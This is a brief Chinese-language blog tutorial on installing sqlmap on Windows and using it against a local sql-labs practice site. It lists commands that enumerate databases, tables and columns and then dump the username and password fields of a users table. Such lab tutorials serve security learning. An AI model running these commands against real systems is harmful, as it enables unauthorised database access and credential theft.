sql注入之sqlmap的安装及使用
安装sqlmap
- 下载安装sqlmap(必须有python环境)
下载链接
解压,点击进入文件
- 修改属性
属性 -->更改目标和起始位置
目标更改为C:\Windows\System32\cmd.exe
起始位置为sqlmap.py的地址
然后把快捷方式名改为sqlmap
- 测试
若出现下图样式,则安装成功
使用sqlmap(以上篇blog搭建的sql-labs举例)
-
介绍几条基本命令
-
sqlmap -u “192.168.23.139:8002/Less-1/?id=1”
-
sqlmap -u “192.168.23.139:8002/Less-1/?id=1” --dbs
-
sqlmap -u “192.168.23.139:8002/Less-1/?id=1” --tables
-
sqlmap -u “192.168.23.139:8002/Less-1/?id=1” -D security -T users --columns
-
sqlmap -u “192.168.23.139:8002/Less-1/?id=1” --dump -D security -T users -C “id,password,username”
最后附上 关于sqlmap 的一些常用命令及解释:链接